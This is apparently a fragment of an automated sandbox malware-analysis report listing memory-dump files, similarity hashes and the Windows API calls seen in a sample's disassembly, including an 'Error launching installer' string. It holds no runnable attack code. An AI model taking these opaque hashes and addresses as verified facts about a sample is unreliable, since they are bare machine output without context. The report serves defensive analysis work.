                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634980867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2634946801.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635034926.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635057456.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635113538.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                          • String ID: Error launching installer
                                                                                                          • API String ID: 3712363035-66219284
                                                                                                          • Opcode ID: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                          • Instruction ID: 39588cd766b2ea89d65183b6a6bcc828c6470883592abd44c37ede1670716c40
                                                                                                          • Opcode Fuzzy Hash: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                          • Instruction Fuzzy Hash: B8E0B6B4600209BFEB109B64ED49F7B7AADEB04708F004665BD50F6191DB74EC158B78
                                                                                                          APIs
                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB7
                                                                                                          • CharNextA.USER32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC8
                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2634980867.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2634946801.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635034926.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635057456.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2635113538.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                          • String ID:
                                                                                                          • API String ID: 190613189-0
                                                                                                          • Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                          • Instruction ID: ee410971918da6c20df7c5ac797640abd601cb5b02c8e88895b13af08820b85c
                                                                                                          • Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                          • Instruction Fuzzy Hash: 22F06231104958AFC7029BA5DD4099FBBB8EF55254B2540A9E840F7211D674FE019BA9